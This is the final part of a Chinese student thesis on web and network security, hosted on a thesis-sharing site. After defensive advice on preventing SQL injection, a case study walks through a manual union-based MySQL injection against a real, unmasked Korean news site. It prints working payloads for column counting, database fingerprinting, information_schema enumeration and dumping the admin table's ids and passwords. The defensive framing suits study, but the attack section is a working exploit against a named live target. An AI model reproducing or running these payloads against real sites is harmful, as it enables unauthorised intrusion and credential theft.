• <ul id="yku8o"></ul>
  • <strike id="yku8o"><nav id="yku8o"></nav></strike>
    論文格式
    電氣工程 會計論文 金融論文 國際貿易 財務管理 人力資源 輕化工程 德語論文 工程管理 文化產業管理 信息計算科學 電氣自動化 歷史論文
    機械設計 電子通信 英語論文 物流論文 電子商務 法律論文 工商管理 旅游管理 市場營銷 電視制片管理 材料科學工程 漢語言文學 免費獲取
    制藥工程 生物工程 包裝工程 模具設計 測控專業 工業工程 教育管理 行政管理 應用物理 電子信息工程 服裝設計工程 教育技術學 論文降重
    通信工程 電子機電 印刷工程 土木工程 交通工程 食品科學 藝術設計 新聞專業 信息管理 給水排水工程 化學工程工藝 推廣賺積分 付款方式
    • 首頁 |
    • 畢業論文 |
    • 論文格式 |
    • 個人簡歷 |
    • 工作總結 |
    • 入黨申請書 |
    • 求職信 |
    • 入團申請書 |
    • 工作計劃 |
    • 免費論文 |
    • 現成論文 |
    • 論文同學網 |
    搜索 高級搜索

    當前位置:論文格式網 -> 免費論文 -> 計算機畢業論文

    網絡層及web應用層的安全技術研究(六)

    本論文在計算機畢業論文欄目,由論文格式網整理,轉載請注明來源www.donglienglish.cn,更多論文,請點論文格式范文查看
      4、 多層環境如何防治SQL注入式攻擊?
      在多層應用環境中,用戶輸入的所有數據都應該在驗證之后才能被允許進入到可信區域。未通過驗證過程的數據應被數據庫拒絕,并向上一層返回一個錯誤信息。實現多層驗證。對無目的的惡意用戶采取的預防措施,對堅定的攻擊者可能無效。更好的做法是在用戶界面和所有跨信任邊界的后續點上驗證輸入。如在客戶端應用程序中驗證數據可以防止簡單的腳本注入。但是,如果下一層認為其輸入已通過驗證,則任何可以繞過客戶端的惡意用戶就可以不受限制地訪問系統。故對于多層應用環境,在防止注入式攻擊的時候,需要各層一起努力,在客戶端與數據庫端都要采用相應的措施來防治SQL語句的注入式攻擊。
      5、 必要的情況下使用專業的漏洞掃描工具來尋找可能被攻擊的點。
    使用專業的漏洞掃描工具,可以幫助管理員來尋找可能被SQL注入式攻擊的點。不過漏洞掃描工具只能發現攻擊點,而不能夠主動起到防御SQL注入攻擊的作用。當然這個工具也經常被攻擊者拿來使用,如攻擊者可以利用這個工具自動搜索攻擊目標并實施攻擊。為此在必要的情況下,企業應當投資于一些專業的漏洞掃描工具。一個完善的漏洞掃描程序不同于網絡掃描程序,它專門查找數據庫中的SQL注入式漏洞。最新的漏洞掃描程序可以查找最新發現的漏洞。所以憑借專業的工具,可以幫助管理員發現SQL注入式漏洞,并提醒管理員采取積極的措施來預防SQL注入式攻擊。如果攻擊者能夠發現的SQL注入式漏洞數據庫管理員都發現了并采取了積極的措施堵住漏洞,那么攻擊者也就無從下手了。

      5.4 MySQL表名注入案例分析

      數值型和字符型比較常見,再有就是搜索型和cookies型的了,遇到一棒子站存在表名注入,什么穿山甲呀,蘿卜呀統統認不出來這個點(也可能是我沒配好),不過確實是個注入點,只好手工搞了。 注入點(就不打碼了): http://www.unionpress.co.kr/news/print_paper.php?number=150683&news_article=news_article 加單引號報錯如下: [caption id="attachment_1427" align="aligncenter" width="481" caption="表名注入"]

                              圖 19 
    [/caption] 由此可得知,這個腳本中至少執行了兩次數據庫操作。 第一條SQL:
    select date from news_article where date_order >= 668740920 order by date_order limit 1
    第二條SQL:
    select * from news_article where number='150683'
    由于SQL中存在where語句,所以若想從表名注入就得把后面的注釋掉,這里使用“;--”。
    order by 1;--
    返回正常頁面
    order by 2;--
    這個時候第一句SQL就報錯了,原因你懂的,而且這里查詢的字段名為“date”,根據我個人的數據庫設計經驗,通常這個字段不會是字符型,也就不利于后續進一步注入,果斷不管它。
    order by 20;--
    正常(除了第一條SQL,后面就不提了)。
    order by 50;--
    報錯(第二條)。
    order by 40;--
    正常
    order by 45;--
    報錯
    order by 43;--
    報錯
    order by 42;--
    正常 好了,現在可以確定第二條查詢語句有42個字段,接下來用union。
    where 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42;--
    [caption id="attachment_1428" align="aligncenter" width="500" caption="表名注入"][/caption] 從返回的結果與正常頁面對比來看,字段2,6,7,16都是字符型。 爆數據庫版本,用戶名,數據庫名:
    where 1=2 union select 1,user(),3,4,5,database(),version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42;--
    得到版本:5.0.90-log;用戶名:upnews@61.97.139.36;數據庫名:upnews 這就好辦了,有information_schema可以用! 爆表(0x75706e657773是upnews的十六進制):
    where 1=2 union select 1,2,3,4,5,(select group_concat(table_name) from (select table_name from information_schema.tables where table_schema=0x75706e657773 limit 0, 10) a),7,8,9,10,11,12,13,14,15,(select count(table_name) from information_schema.tables where table_schema=0x75706e657773),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42;--
    由于第一次用group_concat()直接爆,發現爆出的表個數有誤,而且出現表名截斷現象,所以上面的爆表語句又使用了子查詢,通過limit進行分頁查詢,每次只查出10張表名。 爆字段(0x6e6577735f61646d696e5f6d656d626572是news_admin_member的十六進制):
    where 1=2 union select 1,2,3,4,5,(select group_concat(column_name) from (select column_name from information_schema.columns where table_name=0x6e6577735f61646d696e5f6d656d626572) a),7,8,9,10,11,12,13,14,15,(select count(column_name) from information_schema.columns where table_name=0x6e6577735f61646d696e5f6d656d626572),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42;--
    爆值:
    where 1=2 union select 1,2,3,4,5,(select group_concat(concat(id,0x7c,pass)) from 
    news_admin_member),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42;--
    后面的,誰想干啥就干啥,可以看出來其實表名注入很像數值型注入,甚至比其它類型注入更好用,因為表名之后的SQL完全可以自由控制。
       
    結束語:

    本文主要對目錄的網絡安全技術進行了分析,隨著網絡的發展會有更多新的計算機的攻擊方式和手段出現,也會有更多更新的防護技術手段出現,做好網絡安全防護工作是計算機管理和應用的重要內容,配合高效的防火墻,能夠很好地保障網絡的安全,極大提高網絡的運行效率。對入侵防御技術進行了分析設計。提出一種新的入侵防御系統,該系統數據處理系統可以較好地解決數據處理的性能問題,動態調整的負載均衡策略,較解決單點失效的問題,多臺數據處理機 IDS 并行處理的體系可以較好的解決數據處理的性能問題,提高系統的防御性能。以及 Web 應用的安全現狀,并對一些常見的漏洞進行分析。通過這個分析將 Web 應用面臨的危害呈現出來,最后提出一些常用的防護措施及應急預案,sql注入的分析及一些防護措施。


    三、參考文獻

    [8] 施瑪 (Sima).黑客大曝光:Web 應用安全機密與解決方案[M].電子工業出版社, 2008.
    [9]  白建坤.web服務安全架構研究[J].計算機應用。2005 25(11):2533-2535
    [10] 鄭理華. web 應用安全測試評估系統的研究與實現[D].長沙:國防科學技術大學,2005
    [11] 蔣繼婭,劉彤,王樹威.web 應用中的sql注入攻擊與防護案研究[J].計算機安全,2008,05:09-12.

    首頁 上一頁 3 4 5 6 下一頁 尾頁 6/6/6


    上一篇:物流行業的信息化發展與建設 下一篇:臺州市政務服務網投資項目在線審..
    Tags:網絡 web 應用層 安全 技術 研究 【收藏】 【返回頂部】
    人力資源論文
    金融論文
    會計論文
    財務論文
    法律論文
    物流論文
    工商管理論文
    其他論文
    保險學免費論文
    財政學免費論文
    工程管理免費論文
    經濟學免費論文
    市場營銷免費論文
    投資學免費論文
    信息管理免費論文
    行政管理免費論文
    財務會計論文格式
    數學教育論文格式
    數學與應用數學論文
    物流論文格式范文
    財務管理論文格式
    營銷論文格式范文
    人力資源論文格式
    電子商務畢業論文
    法律專業畢業論文
    工商管理畢業論文
    漢語言文學論文
    計算機畢業論文
    教育管理畢業論文
    現代教育技術論文
    小學教育畢業論文
    心理學畢業論文
    學前教育畢業論文
    中文系文學論文
    計算機論文

    本站部分文章來自網絡,如發現侵犯了您的權益,請聯系指出,本站及時確認刪除 E-mail:349991040@qq.com

    論文格式網(www.donglienglish.cn--論文格式網拼音首字母組合)提供計算機畢業論文畢業論文格式,論文格式范文,畢業論文范文

    Copyright@ 2010-2018 LWGSW.com 論文格式網 版權所有

    感谢您访问我们的网站,您可能还对以下资源感兴趣:

    论文格式网:毕业论文格式范文
    <samp id="ouikm"><tfoot id="ouikm"></tfoot></samp>
      • <strike id="ouikm"></strike>
      • <ul id="ouikm"></ul>
      • <th id="ouikm"></th>